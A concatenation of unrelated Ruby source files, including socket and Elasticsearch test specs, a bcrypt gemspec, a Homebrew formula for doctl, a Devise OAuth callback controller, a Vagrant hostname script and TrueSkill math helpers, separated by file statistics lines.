array[4].should == Socket::AF_INET
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts a String as the address family using IPv6' do
array = Socket.getaddrinfo(nil, 'http', 'INET6')[0]
array[0].should == 'AF_INET6'
array[1].should == 80
array[2].should == '::1'
array[3].should == '::1'
array[4].should == Socket::AF_INET6
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts an object responding to #to_str as the host' do
dummy = mock(:dummy)
dummy.stub!(:to_str).and_return('127.0.0.1')
array = Socket.getaddrinfo(dummy, 'http')[0]
array[0].should == 'AF_INET'
array[1].should == 80
array[2].should == '127.0.0.1'
array[3].should == '127.0.0.1'
array[4].should == Socket::AF_INET
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts an object responding to #to_str as the address family' do
dummy = mock(:dummy)
dummy.stub!(:to_str).and_return('INET')
array = Socket.getaddrinfo(nil, 'http', dummy)[0]
array[0].should == 'AF_INET'
array[1].should == 80
array[2].should == '127.0.0.1'
array[3].should == '127.0.0.1'
array[4].should == Socket::AF_INET
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts a Fixnum as the socket type' do
Socket.getaddrinfo(nil, 'http', :INET, Socket::SOCK_STREAM)[0].should == [
'AF_INET',
80,
'127.0.0.1',
'127.0.0.1',
Socket::AF_INET,
Socket::SOCK_STREAM,
Socket::IPPROTO_TCP
]
end
it 'accepts a Symbol as the socket type' do
Socket.getaddrinfo(nil, 'http', :INET, :STREAM)[0].should == [
'AF_INET',
80,
'127.0.0.1',
'127.0.0.1',
Socket::AF_INET,
Socket::SOCK_STREAM,
Socket::IPPROTO_TCP
]
end
it 'accepts a String as the socket type' do
Socket.getaddrinfo(nil, 'http', :INET, 'STREAM')[0].should == [
'AF_INET',
80,
'127.0.0.1',
'127.0.0.1',
Socket::AF_INET,
Socket::SOCK_STREAM,
Socket::IPPROTO_TCP
]
end
it 'accepts an object responding to #to_str as the socket type' do
dummy = mock(:dummy)
dummy.stub!(:to_str).and_return('STREAM')
Socket.getaddrinfo(nil, 'http', :INET, dummy)[0].should == [
'AF_INET',
80,
'127.0.0.1',
'127.0.0.1',
Socket::AF_INET,
Socket::SOCK_STREAM,
Socket::IPPROTO_TCP
]
end
it 'accepts a Fixnum as the protocol family' do
addr = Socket.getaddrinfo(nil, 'http', :INET, :DGRAM, Socket::IPPROTO_UDP)
addr[0].should == [
'AF_INET',
80,
'127.0.0.1',
'127.0.0.1',
Socket::AF_INET,
Socket::SOCK_DGRAM,
Socket::IPPROTO_UDP
]
end
it 'accepts a Fixnum as the flags' do
addr = Socket.getaddrinfo(nil, 'http', :INET, :STREAM,
Socket::IPPROTO_TCP, Socket::AI_PASSIVE)
addr[0].should == [
'AF_INET',
80,
'0.0.0.0',
'0.0.0.0',
Socket::AF_INET,
Socket::SOCK_STREAM,
Socket::IPPROTO_TCP
]
end
it 'performs a reverse lookup when the reverse_lookup argument is true' do
addr = Socket.getaddrinfo(nil, 'http', :INET, :STREAM,
Socket::IPPROTO_TCP, 0, true)[0]
addr[0].should == 'AF_INET'
addr[1].should == 80
addr[2].should be_an_instance_of(String)
addr[2].should_not == addr[3]
addr[3].should == '127.0.0.1'
end
it 'performs a reverse lookup when the reverse_lookup argument is :hostname' do
addr = Socket.getaddrinfo(nil, 'http', :INET, :STREAM,
Socket::IPPROTO_TCP, 0, :hostname)[0]
addr[0].should == 'AF_INET'
addr[1].should == 80
addr[2].should be_an_instance_of(String)
addr[2].should_not == addr[3]
addr[3].should == '127.0.0.1'
end
it 'performs a reverse lookup when the reverse_lookup argument is :numeric' do
addr = Socket.getaddrinfo(nil, 'http', :INET, :STREAM,
Socket::IPPROTO_TCP, 0, :numeric)[0]
addr.should == [
'AF_INET',
80,
'127.0.0.1',
'127.0.0.1',
Socket::AF_INET,
Socket::SOCK_STREAM,
Socket::IPPROTO_TCP
]
end
end
describe 'with global reverse lookups' do
before do
@do_not_reverse_lookup = BasicSocket.do_not_reverse_lookup
BasicSocket.do_not_reverse_lookup = false
end
after do
BasicSocket.do_not_reverse_lookup = @do_not_reverse_lookup
end
it 'returns an address honoring the global lookup option' do
addr = Socket.getaddrinfo(nil, 'http', :INET)[0]
addr[0].should == 'AF_INET'
addr[1].should == 80
# We don't have control over this value and there's no way to test this
# without relying on Socket.getaddrinfo()'s own behaviour (meaning this
# test would faily any way of the method was not implemented correctly).
addr[2].should be_an_instance_of(String)
addr[2].should_not == addr[3]
addr[3].should == '127.0.0.1'
end
end
end
| 28.745247 | 83 | 0.584921 |
abb01f1f606274c44392ba80fa3ca6c0cb291f1d | 1,832 | # -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = "bcrypt"
s.version = "3.1.10"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.authors = ["Coda Hale"]
s.date = "2015-01-29"
s.description = " bcrypt() is a sophisticated and secure hash algorithm designed by The OpenBSD project\n for hashing passwords. The bcrypt Ruby gem provides a simple wrapper for safely handling\n passwords.\n"
s.email = "[email protected]"
s.extensions = ["ext/mri/extconf.rb"]
s.extra_rdoc_files = ["README.md", "COPYING", "CHANGELOG", "lib/bcrypt/engine.rb", "lib/bcrypt/error.rb", "lib/bcrypt/password.rb", "lib/bcrypt.rb"]
s.files = ["README.md", "COPYING", "CHANGELOG", "lib/bcrypt/engine.rb", "lib/bcrypt/error.rb", "lib/bcrypt/password.rb", "lib/bcrypt.rb", "ext/mri/extconf.rb"]
s.homepage = "https://github.com/codahale/bcrypt-ruby"
s.licenses = ["MIT"]
s.rdoc_options = ["--title", "bcrypt-ruby", "--line-numbers", "--inline-source", "--main", "README.md"]
s.require_paths = ["lib"]
s.rubygems_version = "1.8.24"
s.summary = "OpenBSD's bcrypt() password hashing algorithm."
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_development_dependency(%q<rake-compiler>, ["~> 0.9.2"])
s.add_development_dependency(%q<rspec>, [">= 3"])
s.add_development_dependency(%q<rdoc>, ["~> 3.12"])
else
s.add_dependency(%q<rake-compiler>, ["~> 0.9.2"])
s.add_dependency(%q<rspec>, [">= 3"])
s.add_dependency(%q<rdoc>, ["~> 3.12"])
end
else
s.add_dependency(%q<rake-compiler>, ["~> 0.9.2"])
s.add_dependency(%q<rspec>, [">= 3"])
s.add_dependency(%q<rdoc>, ["~> 3.12"])
end
end
| 45.8 | 221 | 0.646288 |
214217ae3ecefce528eb96ee2f379cfbbbe60201 | 6,135 | require 'test_helper'
require 'active_record'
Mongo.setup!
module Elasticsearch
module Model
class MultipleModelsIntegration < Elasticsearch::Test::IntegrationTestCase
context "Multiple models" do
setup do
ActiveRecord::Schema.define(:version => 1) do
create_table :episodes do |t|
t.string :name
t.datetime :created_at, :default => 'NOW()'
end
create_table :series do |t|
t.string :name
t.datetime :created_at, :default => 'NOW()'
end
end
module ::NameSearch
extend ActiveSupport::Concern
included do
include Elasticsearch::Model
include Elasticsearch::Model::Callbacks
settings index: {number_of_shards: 1, number_of_replicas: 0} do
mapping do
indexes :name, type: 'string', analyzer: 'snowball'
indexes :created_at, type: 'date'
end
end
end
end
class ::Episode < ActiveRecord::Base
include NameSearch
end
class ::Series < ActiveRecord::Base
include NameSearch
end
[::Episode, ::Series].each do |model|
model.delete_all
model.__elasticsearch__.create_index! force: true
model.create name: "The #{model.name}"
model.create name: "A great #{model.name}"
model.create name: "The greatest #{model.name}"
model.__elasticsearch__.refresh_index!
end
end
should "find matching documents across multiple models" do
response = Elasticsearch::Model.search(%q<"The greatest Episode"^2 OR "The greatest Series">, [Series, Episode])
assert response.any?, "Response should not be empty: #{response.to_a.inspect}"
assert_equal 2, response.results.size
assert_equal 2, response.records.size
assert_instance_of Elasticsearch::Model::Response::Result, response.results.first
assert_instance_of Episode, response.records.first
assert_instance_of Series, response.records.last
assert_equal 'The greatest Episode', response.results[0].name
assert_equal 'The greatest Episode', response.records[0].name
assert_equal 'The greatest Series', response.results[1].name
assert_equal 'The greatest Series', response.records[1].name
end
should "provide access to results" do
response = Elasticsearch::Model.search(%q<"A great Episode"^2 OR "A great Series">, [Series, Episode])
assert_equal 'A great Episode', response.results[0].name
assert_equal true, response.results[0].name?
assert_equal false, response.results[0].boo?
assert_equal 'A great Series', response.results[1].name
assert_equal true, response.results[1].name?
assert_equal false, response.results[1].boo?
end
should "only retrieve records for existing results" do
::Series.find_by_name("The greatest Series").delete
::Series.__elasticsearch__.refresh_index!
response = Elasticsearch::Model.search(%q<"The greatest Episode"^2 OR "The greatest Series">, [Series, Episode])
assert response.any?, "Response should not be empty: #{response.to_a.inspect}"
assert_equal 2, response.results.size
assert_equal 1, response.records.size
assert_instance_of Elasticsearch::Model::Response::Result, response.results.first
assert_instance_of Episode, response.records.first
assert_equal 'The greatest Episode', response.results[0].name
assert_equal 'The greatest Episode', response.records[0].name
end
if Mongo.available?
Mongo.connect_to 'mongoid_collections'
context "Across mongoid models" do
setup do
class ::Image
include Mongoid::Document
include Elasticsearch::Model
include Elasticsearch::Model::Callbacks
field :name, type: String
attr_accessible :name if respond_to? :attr_accessible
settings index: {number_of_shards: 1, number_of_replicas: 0} do
mapping do
indexes :name, type: 'string', analyzer: 'snowball'
indexes :created_at, type: 'date'
end
end
def as_indexed_json(options={})
as_json(except: [:_id])
end
end
Image.delete_all
Image.__elasticsearch__.create_index! force: true
Image.create! name: "The Image"
Image.create! name: "A great Image"
Image.create! name: "The greatest Image"
Image.__elasticsearch__.refresh_index!
Image.__elasticsearch__.client.cluster.health wait_for_status: 'yellow'
end
should "find matching documents across multiple models" do
response = Elasticsearch::Model.search(%q<"greatest Episode" OR "greatest Image"^2>, [Episode, Image])
assert response.any?, "Response should not be empty: #{response.to_a.inspect}"
assert_equal 2, response.results.size
assert_equal 2, response.records.size
assert_instance_of Elasticsearch::Model::Response::Result, response.results.first
assert_instance_of Image, response.records.first
assert_instance_of Episode, response.records.last
assert_equal 'The greatest Image', response.results[0].name
assert_equal 'The greatest Image', response.records[0].name
assert_equal 'The greatest Episode', response.results[1].name
assert_equal 'The greatest Episode', response.records[1].name
end
end
end
end
end
end
end
| 37.181818 | 122 | 0.599348 |
acaf0492e74010af0e856457e52568435ddbf005 | 1,876 | require_relative 'skyscanner_api'
module Skyscanner
class FlightInfo
attr_reader :flightInfo
def initialize(originData)
carrierId2Carrier = getCarrierId2Carrier(originData)
placeId2Place = getPlaceId2Place(originData)
@flightInfo = extractFlightInfo(carrierId2Carrier, placeId2Place, originData)
end
def flightInfo
@flightInfo
end
def self.find(market:, currency:, locale:, originPlace:, destinationPlace:, outboundPartialDate:)
originData = SkyscannerApi.getOriginData(market, currency, locale, originPlace, destinationPlace, outboundPartialDate)
new(originData)
end
private
def getCarrierId2Carrier(originData)
carriers = originData['Carriers']
carrierId2Carrier = Hash.new()
carriers.each do |carrier|
carrierId2Carrier[carrier['CarrierId']] = carrier['Name']
end
carrierId2Carrier
end
private
def getPlaceId2Place(originData)
places = originData["Places"]
placeId2Place = Hash.new()
places.each do |place|
if place["Type"] == "Station"
placeId2Place[place["PlaceId"]] = place["Name"] #+","+place["CountryName"]
end
end
placeId2Place
end
private
def extractFlightInfo(carrierId2Carrier, placeId2Place, originData)
quotes = originData["Quotes"]
quotes.each do |quote|
if(quote["OutboundLeg"]["CarrierIds"].empty? == false)
for i in 0..quote["OutboundLeg"]["CarrierIds"].length
quote["OutboundLeg"]["CarrierIds"][i] = carrierId2Carrier[quote["OutboundLeg"]["CarrierIds"][i]]
end
end
quote["OutboundLeg"]["OriginId"] = placeId2Place[quote["OutboundLeg"]["OriginId"]]
quote["OutboundLeg"]["DestinationId"] = placeId2Place[quote["OutboundLeg"]["DestinationId"]]
end
quotes
end
end
end
| 31.266667 | 124 | 0.668977 |
1abb96206eb5260c8a7d6747967ab4276fbf3d86 | 195 | Rails.application.routes.draw do
resources :workouts, only: [] do
resources :entries, only: [:index, :create, :destroy] do
collection { post :create_from_nickname }
end
end
end
| 24.375 | 60 | 0.687179 |
87e6578c0236a8918a6c95d3c2bc4f13e31b1a16 | 641 | # frozen_string_literal: true
RSpec.describe FiniteMachine::HookEvent, "#new" do
it "reads event name" do
hook_event = described_class.new(:green, :go, :green)
expect(hook_event.name).to eql(:green)
end
it "reads event type" do
hook_event = described_class.new(:green, :go, :green)
expect(hook_event.type).to eql(FiniteMachine::HookEvent)
end
it "reads the from state" do
hook_event = described_class.new(:green, :go, :red)
expect(hook_event.from).to eql(:red)
end
it "freezes object" do
hook_event = described_class.new(:green, :go, :green)
expect(hook_event.frozen?).to eq(true)
end
end
| 26.708333 | 60 | 0.697348 |
ab57ce6c2f0c132de62840291b3a121f5e385b37 | 510 | module BetterRecord
module InjectMethods
def self.included(base)
base.extend self
end
def method_missing(method, *args, &block)
begin
if BetterRecord.attributes[method.to_sym]
m = method.to_sym
self.class.define_method m do
BetterRecord.__send__ m
end
BetterRecord.__send__ m
else
raise NoMethodError
end
rescue NoMethodError
super(method, *args, &block)
end
end
end
end
| 21.25 | 49 | 0.598039 |
1c97d934ea81934859142094d1438c07a0f29fb7 | 172 | # frozen_string_literal: true
module Alchemy
VERSION = "6.0.0-rc2"
def self.version
VERSION
end
def self.gem_version
Gem::Version.new(VERSION)
end
end
| 12.285714 | 29 | 0.69186 |
1d3c588af023921e6d3cb5496dd0974a6979ae0b | 187 |
SpecialistSector.where(['edition_id IS NOT NULL AND tag LIKE ?', 'nhs-population-screening-programmes%']).each do |sector|
sector.tag = sector.tag.sub(/\Anhs-/, '')
sector.save!
end
| 31.166667 | 122 | 0.705882 |
e25b8842072d2e6e116a063f33cfd5316311fade | 68 | def init
super
sections.last.place(:specs).before(:source)
end
| 11.333333 | 45 | 0.720588 |
acdfbe33a6fb67afe9961066ec7bd85834838a31 | 5,806 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DataFactory::Mgmt::V2018_06_01
module Models
#
# Execute data flow activity.
#
class ExecuteDataFlowActivity < ExecutionActivity
include MsRestAzure
def initialize
@type = "ExecuteDataFlow"
end
attr_accessor :type
# @return [DataFlowReference] Data flow reference.
attr_accessor :data_flow
# @return [DataFlowStagingInfo] Staging info for execute data flow
# activity.
attr_accessor :staging
# @return [IntegrationRuntimeReference] The integration runtime
# reference.
attr_accessor :integration_runtime
# @return [ExecuteDataFlowActivityTypePropertiesCompute] Compute
# properties for data flow activity.
attr_accessor :compute
#
# Mapper for ExecuteDataFlowActivity class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ExecuteDataFlow',
type: {
name: 'Composite',
class_name: 'ExecuteDataFlowActivity',
model_properties: {
additional_properties: {
client_side_validation: true,
required: false,
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'ObjectElementType',
type: {
name: 'Object'
}
}
}
},
name: {
client_side_validation: true,
required: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
description: {
client_side_validation: true,
required: false,
serialized_name: 'description',
type: {
name: 'String'
}
},
depends_on: {
client_side_validation: true,
required: false,
serialized_name: 'dependsOn',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ActivityDependencyElementType',
type: {
name: 'Composite',
class_name: 'ActivityDependency'
}
}
}
},
user_properties: {
client_side_validation: true,
required: false,
serialized_name: 'userProperties',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'UserPropertyElementType',
type: {
name: 'Composite',
class_name: 'UserProperty'
}
}
}
},
type: {
client_side_validation: true,
required: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
linked_service_name: {
client_side_validation: true,
required: false,
serialized_name: 'linkedServiceName',
type: {
name: 'Composite',
class_name: 'LinkedServiceReference'
}
},
policy: {
client_side_validation: true,
required: false,
serialized_name: 'policy',
type: {
name: 'Composite',
class_name: 'ActivityPolicy'
}
},
data_flow: {
client_side_validation: true,
required: true,
serialized_name: 'typeProperties.dataFlow',
default_value: {},
type: {
name: 'Composite',
class_name: 'DataFlowReference'
}
},
staging: {
client_side_validation: true,
required: false,
serialized_name: 'typeProperties.staging',
type: {
name: 'Composite',
class_name: 'DataFlowStagingInfo'
}
},
integration_runtime: {
client_side_validation: true,
required: false,
serialized_name: 'typeProperties.integrationRuntime',
type: {
name: 'Composite',
class_name: 'IntegrationRuntimeReference'
}
},
compute: {
client_side_validation: true,
required: false,
serialized_name: 'typeProperties.compute',
type: {
name: 'Composite',
class_name: 'ExecuteDataFlowActivityTypePropertiesCompute'
}
}
}
}
}
end
end
end
end
| 31.215054 | 76 | 0.44609 |
1808085838c9df8cef1dca9b9cfb333768a06481 | 288 | class ChangeEventInitToDefault < ActiveRecord::Migration[4.2]
def up
change_column :events, :visible, :boolean, null: false, default: true
execute "UPDATE events SET visible = true WHERE visible IS NULL"
end
def down
raise ActiveRecord::IrreversibleMigration
end
end
| 26.181818 | 73 | 0.746528 |
287f4ae4e7f8592a31fd41f38825eca9fdedb00b | 2,615 | require 'spec_helper'
describe HawatelPS::Windows::ProcTable do
let(:win32_data) { FactoryGirl.build(:win32_data) }
before do
allow(HawatelPS::Windows::ProcFetch).to receive(:get_process).and_return(Array.new([win32_data[:proc_attrs]]))
end
it "return all process instances" do
process = HawatelPS::Windows::ProcTable.proc_table
expect(process[0].processid).to match(/^[0-9]+$/)
end
it "return proc attributes" do
process = HawatelPS::Windows::ProcTable.proc_table
expect(process[0].each).to be_a(Enumerator)
end
it "search process by name" do
process = HawatelPS::Windows::ProcTable.search_by_name('rubymine.exe')
expect(process[0].processid).to match(/^[0-9]+$/)
end
it "search process by name using regex" do
process = HawatelPS::Windows::ProcTable.search_by_name('/^ruby/')
expect(process[0].processid).to match(/^[0-9]*$/)
end
it "search process by name using regex with raise error" do
process = HawatelPS::Windows::ProcTable.search_by_name('/^jasdfsdfva/')
expect { process[0].pid }.to raise_error(NoMethodError)
end
it "search process by pid" do
process = HawatelPS::Windows::ProcTable.search_by_pid(9336)
expect(process.processid).to eq('9336')
end
it "search process by condition == " do
process = HawatelPS::Windows::ProcTable.search_by_condition(:attr => 'processid', :oper => '==', :value => '9336')
expect(process[0].processid).to eq('9336')
end
it "search process by condition <= " do
process = HawatelPS::Windows::ProcTable.search_by_condition(:attr => 'workingsetsize', :oper => '<=', :value => '437301248')
expect(process[0].processid).to match(/^[0-9]*$/)
end
it "search process by condition >= " do
process = HawatelPS::Windows::ProcTable.search_by_condition(:attr => 'workingsetsize', :oper => '>=', :value => '200000')
expect(process[0].processid).to match(/^[0-9]*$/)
end
it "search process by condition != " do
process = HawatelPS::Windows::ProcTable.search_by_condition(:attr => 'workingsetsize', :oper => '!=', :value => '200000')
expect(process[0].processid).to match(/^[0-9]*$/)
end
it "search process by condition > " do
process = HawatelPS::Windows::ProcTable.search_by_condition(:attr => 'workingsetsize', :oper => '>', :value => '200000')
expect(process[0].processid).to match(/^[0-9]*$/)
end
it "search process by condition < " do
process = HawatelPS::Windows::ProcTable.search_by_condition(:attr => 'workingsetsize', :oper => '<', :value => '537301248')
expect(process[0].processid).to match(/^[0-9]*$/)
end
end | 36.830986 | 128 | 0.676482 |
bb465cc4ea45abb3e7aee3731c85696e8f7b73c4 | 1,595 | class Doctl < Formula
desc "Command-line tool for DigitalOcean"
homepage "https://github.com/digitalocean/doctl"
url "https://github.com/digitalocean/doctl/archive/v1.40.0.tar.gz"
sha256 "2a1877097183b9a47bad7a0942174b4a98ad6182db29d7d76720ee709fcf4c02"
head "https://github.com/digitalocean/doctl.git"
bottle do
cellar :any_skip_relocation
sha256 "0d2e9299897198232be035d7f9e44548f1f30a4fd6017a985171f62ca8726432" => :catalina
sha256 "1447c8b1ccf051028d66a0f2f40a5a741120a1a179daea3af2c71cf6aeb935e1" => :mojave
sha256 "5f16e005f514d492247a90d4eec34af46485d6ae4012e48324476967656cc97b" => :high_sierra
sha256 "47bbaa82affdca1a9d47724be2af87c98ac62bfe07af407b58311553b3ca3476" => :x86_64_linux
end
depends_on "go" => :build
def install
ENV["GOPATH"] = buildpath
doctl_version = version.to_s.split(/\./)
src = buildpath/"src/github.com/digitalocean/doctl"
src.install buildpath.children
src.cd do
base_flag = "-X github.com/digitalocean/doctl"
ldflags = %W[
#{base_flag}.Major=#{doctl_version[0]}
#{base_flag}.Minor=#{doctl_version[1]}
#{base_flag}.Patch=#{doctl_version[2]}
#{base_flag}.Label=release
].join(" ")
system "go", "build", "-ldflags", ldflags, "-o", bin/"doctl", "github.com/digitalocean/doctl/cmd/doctl"
end
(bash_completion/"doctl").write `#{bin}/doctl completion bash`
(zsh_completion/"_doctl").write `#{bin}/doctl completion zsh`
end
test do
assert_match "doctl version #{version}-release", shell_output("#{bin}/doctl version")
end
end
| 36.25 | 109 | 0.721003 |
4a959535f238a26320d3158876ae2edb1ae9f774 | 9,998 | class Auth::OmniauthCallbacksController < Devise::OmniauthCallbacksController
# Disable CSRF since the token information is lost.
skip_before_action :verify_authenticity_token
# ==> Failure route.
def failure
# Find the error message and log it for analysis.
error_message = failure_message ||
request.params['error_description'] ||
I18n.t('devise.omniauth_callbacks.unknown_failure')
logger.error error_message
# Show a flash message and redirect.
flash_failure error_message
redirect_to root_path
end
# ==> Provider callbacks.
def google_oauth2
auth_hash[:info][:institution] = auth_hash.extra[:raw_info][:hd]
generic_oauth
end
def office365
generic_oauth
end
def lti
try_login!
end
def oidc
try_login!
end
def saml
try_login!
end
def smartschool
generic_oauth
end
private
# ==> Authentication logic.
def generic_oauth
return provider_missing! if oauth_provider_id.blank?
# Find the provider for the current institution. If no provider exists yet,
# a new one will be created.
return redirect_with_flash!(I18n.t('auth.sign_in.errors.institution-creation')) if provider.blank?
try_login!
end
def try_login!
# Ensure that an appropriate provider is used.
return redirect_to_preferred_provider! if provider.redirect?
# Find the identity.
identity, user = find_identity_and_user
if identity.blank?
# If no identity was found and the provider is a link provider, prompt the
# user to sign in with a preferred provider.
return redirect_to_preferred_provider! if provider.link?
# Create a new user and identity.
user = User.new institution: provider&.institution if user.blank?
identity = user.identities.build identifier: auth_uid, provider: provider
end
# Validation.
raise 'Identity should not be nil here' if identity.nil?
# Update the user information from the authentication response.
user.update_from_provider(auth_hash, provider)
return redirect_with_errors!(user) if user.errors.any?
# Link the stored identifier to the signed in user.
create_linked_identity!(user)
# User successfully updated, finish the authentication procedure. Force is
# required to overwrite the current existing user.
sign_in user, event: :authentication, force: true
# Redirect the user to their destination.
redirect_to_target!(user)
end
# ==> Utilities.
def create_linked_identity!(user)
# Find the link provider and uid in the session.
link_provider_id = session.delete(:auth_link_provider_id)
link_uid = session.delete(:auth_link_uid)
return if link_provider_id.blank? || link_uid.blank?
# Find the actual provider.
link_provider = Provider.find(link_provider_id)
return if link_provider.blank?
# Create the identity for the current user.
Identity.create(identifier: link_uid, provider: link_provider, user: user)
if session[:hide_flash].blank?
# Set a flash message.
set_flash_message :notice, :linked
end
session.delete(:hide_flash)
end
def find_identity_and_user
# Attempt to find the identity by its identifier.
identity = Identity.find_by(identifier: auth_uid, provider: provider)
return [identity, identity.user] if identity.present? && auth_uid.present?
# No username was provided, try to find the user using the email address.
user = User.from_email(auth_email)
return [nil, nil] if user.blank?
# Find an identity for the user at the current provider.
[Identity.find_by(provider: provider, user: user), user]
end
def find_or_create_oauth_provider
# Find an existing provider.
provider_type = Provider.for_sym(auth_provider_type)
provider = provider_type.find_by(identifier: oauth_provider_id)
return provider if provider.present?
# Provider was not found. Currently, a new institution will be created for
# every new provider as well.
name, short_name = provider_type.extract_institution_name(auth_hash)
institution = Institution.new name: name,
short_name: short_name,
logo: "#{auth_provider_type}.png"
provider = institution.providers.build identifier: oauth_provider_id,
type: provider_type.name
if institution.save
institution_created
provider
else
institution_creation_failed institution.errors
nil
end
end
def flash_failure(reason)
return unless is_navigational_format?
# Get the provider type.
provider_type = auth_provider_type || request.env['omniauth.error.strategy']&.name || 'OAuth2'
set_flash_message :alert, :failure, kind: provider_type, reason: reason
flash[:extra] = { url: contact_path, message: I18n.t('pages.contact.prompt') }
end
def redirect_to_preferred_provider!
# Store the uid and the id of the current provider in the session, to link
# the identities after returning.
session[:auth_link_provider_id] = provider.id if provider.link?
session[:auth_link_uid] = auth_uid if provider.link?
# Find the preferred provider for the current institution.
preferred_provider = provider.institution.preferred_provider
# If this is the first time a user is logging in with LTI, we do something special: LTI
# related screens are often shown inside an iframe, which some providers don't support
# (for example, UGent SAML doesn't).
# We try our best to detect an iframe with the Sec-Fetch-Dest header, but at the time of
# writing, Firefox and Safari don't support it.
if auth_provider_type == Provider::Lti.sym && request.headers['Sec-Fetch-Dest'] != 'document'
# The header is nil, in which case we don't know if it is an iframe or not, or the header is
# "iframe", in which case we do know it is an iframe.
# Anyway, we save the original target, and redirect to a web page.
# We are not saving the entire URL, since this can be lengthy
# and cause problems overflowing the session.
session[:original_redirect] = URI.parse(target_path(:user)).path
redirect_to lti_redirect_path(sym: preferred_provider.class.sym, provider: preferred_provider)
else
# Redirect to the provider.
redirect_to omniauth_authorize_path(:user, preferred_provider.class.sym, provider: preferred_provider)
end
end
def redirect_with_errors!(resource)
logger.info "User was unable to login because of reason: '#{resource.errors.full_messages.to_sentence}'. More info about the request below:\n" \
"#{auth_hash.pretty_inspect}"
ApplicationMailer.with(authinfo: auth_hash, errors: resource.errors.inspect)
.user_unable_to_log_in
.deliver_later
first_error = resource.errors.first
if first_error.attribute == :institution && first_error.type.to_s == 'must be unique'
flash_wrong_provider provider, resource.identities.first.provider
redirect_to root_path
else
redirect_with_flash! resource.errors.full_messages.to_sentence
end
end
def redirect_with_flash!(message)
flash_failure message
redirect_to root_path
end
def flash_wrong_provider(tried_provider, user_provider)
set_flash_message :alert, :wrong_provider,
tried_provider_type: tried_provider.class.sym.to_s,
tried_provider_institution: tried_provider.institution.name,
user_provider_type: user_provider.class.sym.to_s,
user_institution: user_provider.institution.name
flash[:extra] = { message: I18n.t('devise.omniauth_callbacks.wrong_provider_extra', user_provider_type: user_provider.class.sym.to_s), url: omniauth_authorize_path(:user, user_provider.class.sym, provider: user_provider) }
end
def redirect_to_target!(user)
redirect_to target_path(user)
end
# ==> Shorthands.
def target_path(user)
auth_target || after_sign_in_path_for(user)
end
def auth_hash
request.env['omniauth.auth']
end
def auth_email
auth_hash.info.email
end
def auth_provider_type
return nil if auth_hash.blank?
auth_hash.provider.to_sym
end
def auth_redirect_params
auth_hash.extra[:redirect_params].to_h || {}
end
def auth_target
return nil if auth_hash.extra[:target].blank?
"#{auth_hash.extra[:target]}?#{auth_redirect_params.to_param}"
end
def auth_uid
auth_hash.uid
end
def oauth_provider
@oauth_provider ||= find_or_create_oauth_provider
end
def oauth_provider_id
auth_hash.info.institution
end
def provider
# Extract the provider from the authentication hash.
return auth_hash.extra.provider if [Provider::Lti.sym, Provider::Saml.sym].include?(auth_provider_type)
# Fallback to an oauth provider
oauth_provider
end
# ==> Event handlers.
def institution_created
logger.info "Institution with identifier #{oauth_provider_id} created (#{auth_provider_type}). " \
"See below for more info about the request:\n" \
"#{auth_hash.pretty_inspect}"
ApplicationMailer.with(authinfo: auth_hash)
.institution_created
.deliver_later
end
def institution_create_failed(errors)
logger.info "Failed to created institution with identifier #{oauth_provider_id} (#{auth_provider_type}). " \
"See below for more info about the request:\n" \
"#{auth_hash.pretty_inspect}" \
"#{errors}"
ApplicationMailer.with(authinfo: auth_hash, errors: errors.inspect)
.institution_creation_failed
.deliver_later
end
def provider_missing!
flash_failure I18n.t('auth.sign_in.errors.missing-provider')
redirect_to sign_in_path
end
end
| 32.888158 | 226 | 0.704441 |
e950c987b900f1d04550be5d332396760d4f69cd | 1,589 | module VagrantPlugins
module GuestRedHat
module Cap
class ChangeHostName
def self.change_host_name(machine, name)
comm = machine.communicate
if !comm.test("hostname -f | grep '^#{name}$'", sudo: false)
basename = name.split('.', 2)[0]
comm.sudo <<-EOH.gsub(/^ {14}/, '')
# Update sysconfig
sed -i 's/\\(HOSTNAME=\\).*/\\1#{name}/' /etc/sysconfig/network
# Update DNS
sed -i 's/\\(DHCP_HOSTNAME=\\).*/\\1\"#{basename}\"/' /etc/sysconfig/network-scripts/ifcfg-*
# Set the hostname - use hostnamectl if available
echo '#{name}' > /etc/hostname
if command -v hostnamectl; then
hostnamectl set-hostname --static '#{name}'
hostnamectl set-hostname --transient '#{name}'
else
hostname -F /etc/hostname
fi
# Remove comments and blank lines from /etc/hosts
sed -i'' -e 's/#.*$//' -e '/^$/d' /etc/hosts
# Prepend ourselves to /etc/hosts
grep -w '#{name}' /etc/hosts || {
sed -i'' '1i 127.0.0.1\\t#{name}\\t#{basename}' /etc/hosts
}
# Restart network (through NetworkManager if running)
if service NetworkManager status 2>&1 | grep -q running; then
service NetworkManager restart
else
service network restart
fi
EOH
end
end
end
end
end
end
| 33.808511 | 106 | 0.49528 |
03c9792ac486002a86eb908192bc5c365e3507a0 | 723 | module TrueSkill::MathGeneral
def ierfcc(p)
return -100 if p >= 2.0
return 100 if p <= 0.0
pp = p < 1.0 ? p : 2 - p
t = Math.sqrt(-2*Math.log(pp/2.0)) # Initial guess
x = -0.70711*((2.30753 + t*0.27061)/(1.0 + t*(0.99229 + t*0.04481)) - t)
[0,1].each do |j|
err = Math.erfc(x) - pp
x += err/(1.12837916709551257*Math.exp(-(x*x)) - x*err)
end
p < 1.0 ? x : -x
end
def cdf(x,mu=0,sigma=1)
return 0.5*Math.erfc(-(x-mu)/(sigma*Math.sqrt(2)))
end
